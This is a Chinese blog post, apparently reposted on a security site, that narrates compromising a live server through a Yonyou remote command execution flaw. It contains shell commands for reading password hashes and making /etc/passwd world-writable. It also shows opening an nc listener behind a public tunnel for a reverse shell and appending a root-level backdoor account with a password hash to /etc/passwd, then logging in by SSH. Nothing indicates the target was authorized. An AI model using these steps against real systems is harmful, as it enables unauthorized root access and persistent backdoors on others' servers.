远程命令执行漏洞并提权

admin 2024年12月10日17:33:24评论9 views字数 571阅读1分54秒阅读模式

实战开始

某站用友的命令执行漏洞,测试print hello发现可以执行命令

远程命令执行漏洞并提权

远程命令执行漏洞并提权

whami 和id 都查一波权限,发现是root,很好搞啊!

远程命令执行漏洞并提权

ps -ef | grep sshd 查一波 发现可以ssh连接,直接useradd用户,但是整个shell无法给用户添加密码,无法远程登录,直接读shadow哈希,爆破密码.
远程命令执行漏洞并提权

远程命令执行漏洞并提权

远程命令执行漏洞并提权

爆破无结果,试一波可以直接写passwd

远程命令执行漏洞并提权

远程命令执行漏洞并提权

再次查看shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是544 ,直接chmod 777 /etc/passwd 改权限,继续写,依然写不进去,换了各种姿势都不行,突然想起了nc反弹!

远程命令执行漏洞并提权

远程命令执行漏洞并提权

果然不错,有nc,通过dnslog查一下是否有外连

远程命令执行漏洞并提权

能ping通,果然能外连,那就可以通过nc反弹搞一波了,本地的攻击机在内网,内网穿透一波,推荐:https://www.uulap.com/ 大家可以试试,将本地的6666端口映射到公网!

远程命令执行漏洞并提权

本地建立监听 nc -lvp 6666

远程命令执行漏洞并提权

让目标机进行nc反弹

远程命令执行漏洞并提权

反弹成功,直接上命令useradd
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash>> /etc/passwd

远程命令执行漏洞并提权

查看已添加成功

远程命令执行漏洞并提权

直接ssh连接,发现是阿里云的服务器

远程命令执行漏洞并提权

如有侵权,请联系删除

原文始发于微信公众号(我爱林):实战 || 远程命令执行漏洞并提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月10日17:33:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   远程命令执行漏洞并提权http://cn-sec.com/archives/2495515.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息